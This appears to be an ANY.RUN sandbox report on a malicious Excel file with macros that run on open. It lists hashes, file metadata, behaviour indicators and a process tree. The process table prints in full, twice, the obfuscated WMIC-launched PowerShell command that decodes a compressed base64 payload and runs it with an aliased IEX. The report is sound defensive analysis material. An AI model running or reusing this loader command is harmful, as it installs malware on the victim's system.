analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample2.XLS

Full analysis: https://app.any.run/tasks/7d8d848d-92fe-4c17-8ee0-4d0404e685ba
Verdict: Malicious activity
Analysis date: July 17, 2019, 08:13:21
OS: Windows 10 Professional (build: 16299, 32 bit)
Tags:
macros
macros-on-open
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0
MD5:

9582B06BFF0F2B43D6693150FCB49C6A

SHA1:

2A90CA7964576B9210C8F35234214F32B412684E

SHA256:

1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555

SSDEEP:

3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 1020)

  • SUSPICIOUS

    • Executed via WMI

      • wMIc.exe (PID: 2780)
      • powErsHell.exe (PID: 3756)

    • PowerShell script executed

      • powErsHell.exe (PID: 3756)

    • Uses RUNDLL32.EXE to load library

      • powErsHell.exe (PID: 3756)
      • rundll32.exe (PID: 548)

    • Reads Environment values

      • powErsHell.exe (PID: 3756)

    • Creates files in the user directory

      • rundll32.exe (PID: 548)

    • Application launched itself

      • rundll32.exe (PID: 548)

  • INFO

    • Reads settings of System Certificates

      • EXCEL.EXE (PID: 1020)
      • powErsHell.exe (PID: 3756)

    • Reads the software policy settings

      • EXCEL.EXE (PID: 1020)
      • powErsHell.exe (PID: 3756)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 1020)

    • Manual execution by user

      • rundll32.exe (PID: 2816)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: autore
Software: Microsoft Excel
CreateDate: 2015:06:05 18:19:34
ModifyDate: 2019:07:16 11:19:40
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 20190716-83748
HeadingPairs:
  • Fogli di lavoro
  • 1
CompObjUserTypeLen: 42
CompObjUserType: (Foglio di lavoro di Microsoft Excel 2019
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
9
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1020"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
2780wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')"C:\WINDOWS\system32\wbem\wMIc.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2968\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
wMIc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
3756powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')C:\WINDOWS\System32\WindowsPowerShell\v1.0\powErsHell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
3344\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
548"C:\WINDOWS\system32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 260C:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
3080C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:00000000C:\WINDOWS\system32\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
1360"C:\WINDOWS\system32\rundll32.exe" /s DllRegisterServerC:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2816"C:\WINDOWS\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cpl,,/p:"location"C:\WINDOWS\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Total events
2 093
Read events
1 819
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
5
Unknown types
5

Dropped files

PID
Process
Filename
Type
